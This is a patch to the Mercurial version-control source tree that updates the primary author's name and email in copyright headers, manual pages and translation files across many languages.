msgid "" "Resources\n" @@ -31367,13 +31367,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31396,12 +31396,12 @@ "----------------------------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -31581,13 +31581,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31629,8 +31629,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial foi escrito por Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial foi escrito por Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -31645,14 +31645,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2006 Vadim Gelfer.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31928,14 +31928,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2005 Bryan O'Sullivan.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -41308,13 +41308,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." #~ msgstr "" #~ "Cópia\n" #~ "\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Garante-se livre uso deste software nos termos da licença\n" #~ "GNU General Public License, versão 2 ou qualquer versão posterior." diff --git a/i18n/ro.po b/i18n/ro.po --- a/i18n/ro.po +++ b/i18n/ro.po @@ -1,7 +1,7 @@ # Romanian translation for Mercurial # Traducerea în limba română pentru Mercurial # -# Copyright (C) 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2010 Olivia Mackall <olivia@selenic.com> and others # # # Glosar de traduceri @@ -10032,11 +10032,11 @@ msgstr "(vezi http://mercurial.selenic.com pentru mai multe informații)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall și alții\n" +"Copyright (C) 2005-2011 Olivia Mackall și alții\n" "Acesta este software liber; vezi sursa pentru condițiile de copiere.\n" "Nu există NICIO garanție; nici măcar pentru COMERCIALIZARE sau\n" "COMPATIBILITATE ÎN ANUMITE SCOPURI.\n" diff --git a/i18n/ru.po b/i18n/ru.po --- a/i18n/ru.po +++ b/i18n/ru.po @@ -1,5 +1,5 @@ # Russian translations for Mercurial package. -# Copyright (C) 2011 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2011 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # === Glossary === # @@ -15590,11 +15590,11 @@ msgstr "(подробнее см. http://mercurial.selenic.com)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"(С) 2005-2014 Matt Mackall и другие.\n" +"(С) 2005-2014 Olivia Mackall и другие.\n" "Это свободное ПО; условия распространения см. в исходном коде.\n" "НИКАКИХ ГАРАНТИЙ НЕ ПРЕДОСТАВЛЯЕТСЯ, в том числе на пригодность для\n" "коммерческого использования и для решения конкретных задач.\n" @@ -21807,7 +21807,7 @@ # NOT SURE should this be translated? msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -22000,11 +22000,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Автор\n" "\"\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -22024,13 +22024,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "\"\"\"\"\"\"\"\"\"\"\"\n" -"(C) 2005-2014 Matt Mackall.\n" +"(C) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22068,8 +22068,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial написан Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial написан Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -22084,14 +22084,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2006 Vadim Gelfer\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22346,14 +22346,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2005 Bryan O'Sullivan\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." diff --git a/i18n/sv.po b/i18n/sv.po --- a/i18n/sv.po +++ b/i18n/sv.po @@ -1,6 +1,6 @@ # Swedish translation for Mercurial # Svensk översättning för Mercurial -# Copyright (C) 2009-2012 Matt Mackall and others +# Copyright (C) 2009-2012 Olivia Mackall and others # # Translation dictionary: # @@ -12413,11 +12413,11 @@ msgstr "(se http://mercurial.selenic.com för mer information)" msgid "" -"Copyright (C) 2005-2012 Matt Mackall and others\n" +"Copyright (C) 2005-2012 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2012 Matt Mackall och andra\n" +"Copyright (C) 2005-2012 Olivia Mackall och andra\n" "Detta är fri mjukvara; se källkoden för kopieringsvillkor. Det ges INGEN\n" "garanti; inte ens för SÄLJBARHET eller ATT PASSA FÖR ETT VISST ÄNDAMÅL.\n" diff --git a/i18n/zh_CN.po b/i18n/zh_CN.po --- a/i18n/zh_CN.po +++ b/i18n/zh_CN.po @@ -7409,12 +7409,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"版权所有 (C) 2005-2010 Matt Mackall <mpm@selenic.com> 和其他人。\n" +"版权所有 (C) 2005-2010 Olivia Mackall <olivia@selenic.com> 和其他人。\n" "这是自由软件,具体参见版权条款。这里没有任何担保,甚至没有适合\n" "特定目的的隐含的担保。\n" diff --git a/i18n/zh_TW.po b/i18n/zh_TW.po --- a/i18n/zh_TW.po +++ b/i18n/zh_TW.po @@ -1,5 +1,5 @@ # Traditional Chinese translation for Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # Chia-Huan Wu <willie.tw@gmail.com>, 2009. # @@ -8191,7 +8191,7 @@ msgstr "\tSee 'hg help urls' for more information." msgid "" -"Copyright (C) 2005-2010 Matt Mackall and others\n" +"Copyright (C) 2005-2010 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/mercurial/ancestor.py b/mercurial/ancestor.py --- a/mercurial/ancestor.py +++ b/mercurial/ancestor.py @@ -1,6 +1,6 @@ # ancestor.py - generic DAG ancestor algorithm for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/bdiff.c b/mercurial/bdiff.c --- a/mercurial/bdiff.c +++ b/mercurial/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -1,6 +1,6 @@ # branchmap.py - logic to computes, maintain and stores branchmap for local repo # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/cacheutil.py b/mercurial/cacheutil.py --- a/mercurial/cacheutil.py +++ b/mercurial/cacheutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/cext/bdiff.c b/mercurial/cext/bdiff.c --- a/mercurial/cext/bdiff.c +++ b/mercurial/cext/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/charencode.c b/mercurial/cext/charencode.c --- a/mercurial/cext/charencode.c +++ b/mercurial/cext/charencode.c @@ -1,7 +1,7 @@ /* charencode.c - miscellaneous character encoding - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/mpatch.c b/mercurial/cext/mpatch.c --- a/mercurial/cext/mpatch.c +++ b/mercurial/cext/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/osutil.c b/mercurial/cext/osutil.c --- a/mercurial/cext/osutil.c +++ b/mercurial/cext/osutil.c @@ -1,7 +1,7 @@ /* osutil.c - native operating system services - Copyright 2007 Matt Mackall and others + Copyright 2007 Olivia Mackall and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/parsers.c b/mercurial/cext/parsers.c --- a/mercurial/cext/parsers.c +++ b/mercurial/cext/parsers.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1,6 +1,6 @@ # changegroup.py - Mercurial changegroup manipulation functions # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -1,6 +1,6 @@ # changelog.py - changelog class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -1,6 +1,6 @@ # cmdutil.py - help for command processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1,6 +1,6 @@ # commands.py - command processing for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -7891,7 +7891,7 @@ ) license = _( b"(see https://mercurial-scm.org for more information)\n" - b"\nCopyright (C) 2005-2021 Matt Mackall and others\n" + b"\nCopyright (C) 2005-2021 Olivia Mackall and others\n" b"This is free software; see the source for copying conditions. " b"There is NO\nwarranty; " b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" diff --git a/mercurial/commandserver.py b/mercurial/commandserver.py --- a/mercurial/commandserver.py +++ b/mercurial/commandserver.py @@ -1,6 +1,6 @@ # commandserver.py - communicate with Mercurial's API over a pipe # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -1,6 +1,6 @@ # config.py - configuration parsing for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -1,6 +1,6 @@ # context.py - changeset and file context objects for mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1,7 +1,7 @@ # coding: utf8 # copies.py - copy detection for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dagop.py b/mercurial/dagop.py --- a/mercurial/dagop.py +++ b/mercurial/dagop.py @@ -1,6 +1,6 @@ # dagop.py - graph ancestry and topology algorithm for revset # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1,6 +1,6 @@ # debugcommands.py - command processing for debug* commands # -# Copyright 2005-2016 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2016 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/destutil.py b/mercurial/destutil.py --- a/mercurial/destutil.py +++ b/mercurial/destutil.py @@ -1,6 +1,6 @@ # destutil.py - Mercurial utility function for command destination # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/diffhelper.py b/mercurial/diffhelper.py --- a/mercurial/diffhelper.py +++ b/mercurial/diffhelper.py @@ -1,6 +1,6 @@ # diffhelper.py - helper routines for patch # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -1,6 +1,6 @@ # dirstate.py - working directory tracking for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dirstateguard.py b/mercurial/dirstateguard.py --- a/mercurial/dirstateguard.py +++ b/mercurial/dirstateguard.py @@ -1,6 +1,6 @@ # dirstateguard.py - class to allow restoring dirstate after failure # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/discovery.py b/mercurial/discovery.py --- a/mercurial/discovery.py +++ b/mercurial/discovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -1,6 +1,6 @@ # dispatch.py - command dispatching for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/encoding.py b/mercurial/encoding.py --- a/mercurial/encoding.py +++ b/mercurial/encoding.py @@ -1,6 +1,6 @@ # encoding.py - character transcoding support for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -1,6 +1,6 @@ # error.py - Mercurial exceptions # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1,6 +1,6 @@ # exchange.py - utility to exchange data between repos. # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/extensions.py b/mercurial/extensions.py --- a/mercurial/extensions.py +++ b/mercurial/extensions.py @@ -1,6 +1,6 @@ # extensions.py - extension handling for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/fancyopts.py b/mercurial/fancyopts.py --- a/mercurial/fancyopts.py +++ b/mercurial/fancyopts.py @@ -1,6 +1,6 @@ # fancyopts.py - better command line parsing # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -1,6 +1,6 @@ # filelog.py - file history class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -1,6 +1,6 @@ # filemerge.py - file-level merge handling for Mercurial # -# Copyright 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/fileset.py b/mercurial/fileset.py --- a/mercurial/fileset.py +++ b/mercurial/fileset.py @@ -1,6 +1,6 @@ # fileset.py - file set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filesetlang.py b/mercurial/filesetlang.py --- a/mercurial/filesetlang.py +++ b/mercurial/filesetlang.py @@ -1,6 +1,6 @@ # filesetlang.py - parser, tokenizer and utility for file set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/formatter.py b/mercurial/formatter.py --- a/mercurial/formatter.py +++ b/mercurial/formatter.py @@ -1,6 +1,6 @@ # formatter.py - generic output formatting for mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/grep.py b/mercurial/grep.py --- a/mercurial/grep.py +++ b/mercurial/grep.py @@ -1,6 +1,6 @@ # grep.py - logic for history walk and grep # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hbisect.py b/mercurial/hbisect.py --- a/mercurial/hbisect.py +++ b/mercurial/hbisect.py @@ -1,6 +1,6 @@ # changelog bisection for mercurial # -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org> # # Inspired by git bisect, extension skeleton taken from mq.py. diff --git a/mercurial/help.py b/mercurial/help.py --- a/mercurial/help.py +++ b/mercurial/help.py @@ -1,6 +1,6 @@ # help.py - help data for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hg-ssh.8.txt b/mercurial/helptext/hg-ssh.8.txt --- a/mercurial/helptext/hg-ssh.8.txt +++ b/mercurial/helptext/hg-ssh.8.txt @@ -52,7 +52,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -64,7 +64,7 @@ Copying """"""" -Copyright (C) 2005-2016 Matt Mackall. +Copyright (C) 2005-2016 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hg.1.txt b/mercurial/helptext/hg.1.txt --- a/mercurial/helptext/hg.1.txt +++ b/mercurial/helptext/hg.1.txt @@ -6,7 +6,7 @@ Mercurial source code management system --------------------------------------- -:Author: Matt Mackall <mpm@selenic.com> +:Author: Olivia Mackall <olivia@selenic.com> :Organization: Mercurial :Manual section: 1 :Manual group: Mercurial Manual @@ -100,7 +100,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -112,7 +112,7 @@ Copying """"""" -Copyright (C) 2005-2021 Matt Mackall. +Copyright (C) 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgignore.5.txt b/mercurial/helptext/hgignore.5.txt --- a/mercurial/helptext/hgignore.5.txt +++ b/mercurial/helptext/hgignore.5.txt @@ -17,7 +17,7 @@ ====== Vadim Gelfer <vadim.gelfer@gmail.com> -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -26,7 +26,7 @@ Copying ======= This manual page is copyright 2006 Vadim Gelfer. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgrc.5.txt b/mercurial/helptext/hgrc.5.txt --- a/mercurial/helptext/hgrc.5.txt +++ b/mercurial/helptext/hgrc.5.txt @@ -25,7 +25,7 @@ ====== Bryan O'Sullivan <bos@serpentine.com>. -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -34,7 +34,7 @@ Copying ======= This manual page is copyright 2005 Bryan O'Sullivan. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1,6 +1,6 @@ # hg.py - repository classes for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/hgweb/__init__.py b/mercurial/hgweb/__init__.py --- a/mercurial/hgweb/__init__.py +++ b/mercurial/hgweb/__init__.py @@ -1,7 +1,7 @@ # hgweb/__init__.py - web interface to a mercurial repository # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005 Matt Mackall <mpm@selenic.com> +# Copyright 2005 Olivia Mackall 